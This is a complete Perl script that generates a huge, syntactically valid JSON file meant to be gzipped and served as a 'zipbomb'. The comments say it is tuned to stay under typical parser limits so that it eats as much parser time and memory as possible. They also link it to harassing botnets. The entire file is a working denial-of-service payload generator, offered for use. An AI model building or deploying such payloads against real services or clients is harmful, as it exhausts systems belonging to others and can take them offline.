#!/usr/bin/perl -w
# Copyright © 2026 Jamie Zawinski <jwz@jwz.org>
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation. No representations are made about the suitability of this
# software for any purpose. It is provided “as is” without express or
# implied warranty.
#
# Creates an absolutely enormous, but syntactically correct, JSON file,
# suitable for use as a zipbomb.
#
# It attempts to stay below various length and depth limitations, with my
# best guesses as to what typical parsers’ limits are; the goal here being
# to consume as much of the parser’s time and memory as possible before it
# has an excuse to give up early.
#
# With a 10GB file, ‘jq’ parses the entire file and produces no error
# messages, but also no output, and takes nearly 60 seconds to do so
# (Mac Studio M1 Ultra, 2026).
#
# "jsonbomb.pl --max-size 10GB | gzip --best" yields a 705MB file.
# With --no-permute-strings, it is a more reasonable 61MB.
#
# See https://www.jwz.org/blog/2026/01/zipbomb-json/
# and https://www.jwz.org/blog/2024/02/harassing-botnets-with-zipbombs/
#
# Created: 1-Feb-2026.
require 5;
use diagnostics;
use strict;

# json_emit_thing() calls itself once per level of nesting, so silence
# Perl's deep-recursion warning for this file.
no warnings "recursion";

# Name of this script without its directory; prefixed to every message.
my $progname = $0; $progname =~ s@.*/@@g;
my ($version) = ('$Revision: 1.05 $' =~ m/\s(\d[.\d]+)\s/s);

# Defaults.  Each of these can be overridden from the command line.
my $verbose               = 1;      # 0 silences the progress messages
my $permute_strings_p     = 1;      # scramble the text of each string
my $max_string_length     = 1024;
my $max_object_keys       = 1024;
my $max_object_depth      = 1024;
my $max_object_key_length = 250;
my $max_array_length      = 1024;
my $max_array_depth       = 1024;
my $max_output_bytes      = 1024 * 1024;

# The text that every generated string and object key is built from.
my $base_text = 'All work and no play makes Jack a dull boy.';

# Parses a size such as "4096", "512K", "1.5 MB" or "10GB" and returns it
# as a number of bytes.  The K, M and G suffixes are powers of 1024, are
# matched case-insensitively, and may be followed by an optional "B".
#
#   $arg  the option being parsed; only used in messages.
#   $s    the option's value, or undef if the command line ran out.
#
# Does not return when the value is missing or malformed: the problem is
# reported and the program exits, instead of handing undef back to a
# caller that is about to do arithmetic with it.
#
sub parse_bytes($$) {
  my ($arg, $s) = @_;
  usage ("unparsable size: $arg") unless defined($s);

  my %multiplier = (''  => 1,
                    'K' => 1024,
                    'M' => 1024 * 1024,
                    'G' => 1024 * 1024 * 1024);

  # Exactly one number with at most one decimal point, so that things
  # like "1.2.3" are rejected rather than half-converted.
  if (my ($num, $unit) = ($s =~ m@^(\d+(?:\.\d*)?)\s*(?:([KMG])B?)?$@si)) {
    $unit = (defined($unit) ? uc($unit) : '');
    return $num * $multiplier{$unit};
  }

  error ("unparsable size: $arg $s");
}

# Formats a byte count for humans: "0 bytes" for undef, otherwise the
# count in GB, MB, KB or bytes (units are powers of 1024).
#
# The GB form is only used above 2 GB, so anything between 1 and 2 GB is
# printed in MB.  A count that is exactly on a unit boundary is printed in
# the next smaller unit, since the comparisons are strict.
#
sub size_str($) {
  my ($size) = @_;
  return '0 bytes' unless defined($size);

  my $KB = 1024;
  my $MB = 1024 * $KB;
  my $GB = 1024 * $MB;

  return sprintf("%.0f GB", $size / $GB) if ($size > 2 * $GB);
  return sprintf("%.0f MB", $size / $MB) if ($size > $MB);
  return sprintf("%d KB",   $size / $KB) if ($size > $KB);
  return "$size bytes";
}

# When the last progress line was printed (seconds since the epoch), or
# undef before status() has been called for the first time.
my $last_status_time = undef;

# Prints a progress line to stderr, at most once every 10 seconds.
#
#   $bytes  number of bytes written so far.
#
# Does nothing when $verbose is 0.  The very first call only starts the
# clock; setting $last_status_time to 0 beforehand forces a line out.
#
sub status($) {
  my ($bytes) = @_;
  return unless $verbose;

  my $now = time();
  $last_status_time = $now unless defined($last_status_time);
  return unless ($now > $last_status_time + 10);

  # A limit of 0 is accepted on the command line; don't divide by it.
  my $pct = ($max_output_bytes
             ? 100 * $bytes / $max_output_bytes
             : 100);
  print STDERR "$progname: " .
               sprintf("%s (%.0f%%) of %s\n",
                       size_str($bytes), $pct, size_str($max_output_bytes));
  $last_status_time = $now;
}

# Permute the strings in case the parser interns them for efficiency.
# Returns a lightly mangled copy of $line: the words are split on
# whitespace and re-joined with single spaces, and along the way
#
#  - about one word in five (of those with at least two letters) has one
#    pair of its interior letters swapped: the last interior letter trades
#    places with a randomly chosen earlier one.  The first and last letter
#    of the word never move;
#  - about one word in ten is upper-cased.
#
# Uses rand(), so the result differs from call to call.
#
sub scrmable($) {
  my ($line) = @_;
  my @out;

  foreach my $word (split (/\s+/, $line)) {
    my @mid   = split (//, $word);
    my $first = shift (@mid);
    my $last  = pop (@mid);

    # $last is undef for empty and one-letter words: leave those alone.
    if (defined($last) && rand() > 0.8) {
      if (@mid) {
        # One transposition only, so that the word stays recognisable.
        my $hi = $#mid;
        my $lo = int (rand() * $hi);
        @mid[$lo, $hi] = @mid[$hi, $lo];
      }
      $word = $first . join ('', @mid) . $last;
    }

    $word = uc($word) if (rand() > 0.9);
    push @out, $word;
  }

  return join (' ', @out);
}

# Returns a JSON string literal, including its surrounding double quotes,
# built from $base_text.
#
#   $max_length  target length of the text between the quotes.
#
# As many whole copies of $base_text as fit are joined with spaces.  If
# not even one copy fits, a single piece of $base_text is used instead;
# with $permute_strings_p set, that piece starts at a random offset in the
# first 30% of the text and is shortened by up to a further 30%.  With
# $permute_strings_p set the result is also passed through scrmable().
#
sub make_string($) {
  my ($max_length) = @_;
  my $L = length($base_text);

  my @s  = ();
  my $L2 = 0;
  while ($L2 + $L < $max_length) {
    push @s, $base_text;
    $L2 += $L + 1;                      # + 1 for the joining space
  }

  if (!@s) {
    my $start = ($permute_strings_p
                 ? int ($L * rand() * 0.3)
                 : 0);
    my $L3 = $L - $start;
    $L3 = $max_length if ($L3 > $max_length);
    $L3 = ($permute_strings_p
           ? int ($L3 * (1 - rand() * 0.3))
           : $L3);
    push @s, substr ($base_text, $start, $L3);
  }

  my $s = join(' ', @s);
  $s = scrmable ($s) if ($permute_strings_p);

  # This can exceed $max_length if $base_text has special characters,
  # but we don't want to split at a backslash and cause a syntax error.
  #
  # JSON only requires backslash, double quote and the control characters
  # below 0x20 to be escaped.  A single quote must be left alone ("\'" is
  # not a legal escape) and a newline has to become the two characters
  # "\n" rather than a backslash followed by a raw newline.
  if ($s =~ m/[\\"\x00-\x1F]/s) {
    my %esc = ("\\"   => "\\\\",
               "\""   => "\\\"",
               "\n"   => "\\n",
               "\r"   => "\\r",
               "\t"   => "\\t",
               "\x08" => "\\b",
               "\x0C" => "\\f");
    $s =~ s/([\\"\x00-\x1F])/
            exists ($esc{$1}) ? $esc{$1} : sprintf ("\\u%04X", ord ($1))
           /gsex;
  }

  return '"' . $s . '"';
}

# I'd kind of like to unroll this to use heap instead of stack,
# but it's sure a lot easier to think about it recursively.
# Writes one JSON value to stdout and returns the number of bytes written.
#
#   $type         'string', 'array' or 'object'; anything else is fatal.
#   $depth        nesting depth of this value; members get $depth + 1.
#   $total_bytes  bytes written before this value.  Used to notice when
#                 $max_output_bytes has been passed, and for status().
#
# A container stops adding members as soon as the running total passes
# $max_output_bytes, but still writes its closing bracket, so the output
# remains well-formed (and may run slightly over the limit).
#
sub json_emit_thing($$$);
sub json_emit_thing($$$) {
  my ($type, $depth, $total_bytes) = @_;
  my $this_bytes = 0;

  if ($type eq 'string') {

    my $s = make_string ($max_string_length);
    print STDOUT $s;
    $this_bytes += length($s);

  } elsif ($type eq 'array') {

    # Between 80% and 100% of the maximum length.
    my $n = int ($max_array_length * (1 - (rand() * 0.2)));

    # At the depth limit only strings are generated; above it, one member
    # in five is a nested object.
    # NOTE(review): members are strings or objects, never arrays, so
    # arrays only occur at the top level -- confirm that is intended.
    my @types = ($depth >= $max_array_depth
                 ? ('string')
                 : ('string', 'string', 'string', 'string', 'object'));

    print STDOUT '[';
    $this_bytes++;

    for (my $i = 0; $i < $n; $i++) {
      if ($i > 0) {
        print STDOUT ",\n";
        $this_bytes += 2;
      }
      my $type2 = $types[int(rand() * @types)];
      $this_bytes += json_emit_thing ($type2, $depth + 1,
                                      $total_bytes + $this_bytes);
      last if ($total_bytes + $this_bytes > $max_output_bytes);
    }

    print STDOUT ']';
    $this_bytes++;

  } elsif ($type eq 'object') {

    # Between 80% and 100% of the maximum number of keys.  This is its
    # own limit, separate from the array length.
    my $n = int ($max_object_keys * (1 - (rand() * 0.2)));

    my @types = ($depth >= $max_object_depth
                 ? ('string')
                 : ('string', 'string', 'string', 'string', 'object'));

    print STDOUT '{';
    $this_bytes++;

    # Technically duplicate keys are allowed (last one wins) but some
    # parsers consider it an error.
    my %dups;

    for (my $i = 0; $i < $n; $i++) {
      if ($i > 0) {
        print STDOUT ",\n";
        $this_bytes += 2;
      }

      my $s = make_string ($max_object_key_length);
      $s =~ s/\s/_/gs;

      # Make a repeated key unique by appending this member's index in
      # hex, and keep appending in the unlikely case that the result is
      # itself already taken.
      my $ii = sprintf("%X", $i);
      while ($dups{$s}) {
        $s =~ s/"$/_$ii"/s;
      }
      $dups{$s} = 1;

      print STDOUT $s;
      $this_bytes += length($s);
      print STDOUT ":";
      $this_bytes++;

      my $type2 = $types[int(rand() * @types)];
      $this_bytes += json_emit_thing ($type2, $depth + 1,
                                      $total_bytes + $this_bytes);
      last if ($total_bytes + $this_bytes > $max_output_bytes);
    }

    print STDOUT '}';
    $this_bytes++;

  } else {
    error ("unknown type: $type");
  }

  status ($total_bytes + $this_bytes);
  return $this_bytes;
}

# Writes the whole document to stdout: one top-level array whose members
# are generated until at least $max_output_bytes bytes have been written,
# followed by a final progress line on stderr.
#
sub jsonbomb() {

  # Two in six top-level members are containers, the rest are strings.
  my @types = ('array', 'object', 'string', 'string', 'string', 'string');

  # Top level object is always an array.
  print STDOUT '[';
  my $bytes = 1;
  my $count = 0;

  while ($bytes < $max_output_bytes) {
    if ($count > 0) {
      print STDOUT ",\n";
      $bytes += 2;
    }

    my $type = $types[int(rand() * @types)];
    $bytes += json_emit_thing ($type, 0, $bytes);
    $count++;

    if ($count > $max_array_length) {
      # We've hit the max length of the top-level array object.
      # Increase the limits and keep going, because why not.
      print STDERR "$progname: hit max length; increasing limits.\n"
        if ($verbose);
      $max_array_length *= 2;
      $max_object_keys  *= 2;
      $max_object_depth *= 2;
      $max_array_depth  *= 2;
    }
  }

  print STDOUT "]\n";
  $bytes += 2;

  # Zeroing the timestamp makes status() print regardless of how recently
  # it last did, so that the final total is always reported.
  $last_status_time = 0;
  status ($bytes);
}

# Prints "$progname: $err" to stderr and exits with status 1.
# Does not return.
#
sub error($) {
  my ($err) = @_;
  print STDERR "$progname: $err\n";
  exit 1;
}

# Prints the usage summary to stderr and exits with status 1.
# Does not return.
#
#   $bad  optional; if given, it is first reported as an unknown option.
#
# The summary shows the current value of each limit, which is the default
# unless an earlier option on the command line already changed it.
#
sub usage(;$) {
  my ($bad) = @_;
  print STDERR "$progname: unknown option: $bad\n" if defined($bad);
  print STDERR "usage: $progname [--verbose] [--quiet]" .
               " [--max-size " . sprintf("%dK", $max_output_bytes/1024) . "]" .
               " [--permute-strings | --no-permute-strings]" .
               " [--max-object-keys $max_object_keys]" .
               " [--max-object-depth $max_object_depth]" .
               " [--max-object-key-length $max_object_key_length]" .
               " [--max-array-length $max_array_length]" .
               " [--max-array-depth $max_array_depth]" .
               " [--max-string-length $max_string_length]" .
               " [--base-text STRING]" .
               " > OUTFILE.json\n";
  exit 1;
}

# Parses the command line into the file-level settings, then generates
# the document.  Options may be written with one or two leading dashes.
# Anything unrecognised prints the usage message and exits.
#
sub main() {

  # Options that take a size or count, and the setting each one fills in.
  # All of them accept the K/M/G suffixes understood by parse_bytes().
  my %size_opts = (
    'max-size'              => \$max_output_bytes,
    'max-object-keys'       => \$max_object_keys,
    'max-object-depth'      => \$max_object_depth,
    'max-object-key-length' => \$max_object_key_length,
    'max-array-length'      => \$max_array_length,
    'max-array-depth'       => \$max_array_depth,
    'max-string-length'     => \$max_string_length,
  );

  while (@ARGV) {
    $_ = shift @ARGV;
    if    (m/^--?verbose$/s) { $verbose++; }
    elsif (m/^-v+$/s)        { $verbose += length($_)-1; }
    elsif (m/^--?quiet$/s)   { $verbose = 0; }
    elsif (m/^--?([a-z-]+)$/s && $size_opts{$1}) {
      my $setting = $size_opts{$1};
      $$setting = parse_bytes ($_, shift @ARGV);
    }
    elsif (m/^--?base-text$/s) {
      $base_text = shift @ARGV;
      error ("missing argument: $_") unless defined($base_text);
    }
    elsif (m/^--?permute(-strings?)?$/s)    { $permute_strings_p = 1; }
    elsif (m/^--?no-permute(-strings?)?$/s) { $permute_strings_p = 0; }
    else { usage ($_); }
  }

  jsonbomb();
}

# Parse the command line, write the JSON to stdout, then exit successfully.
main();
exit 0;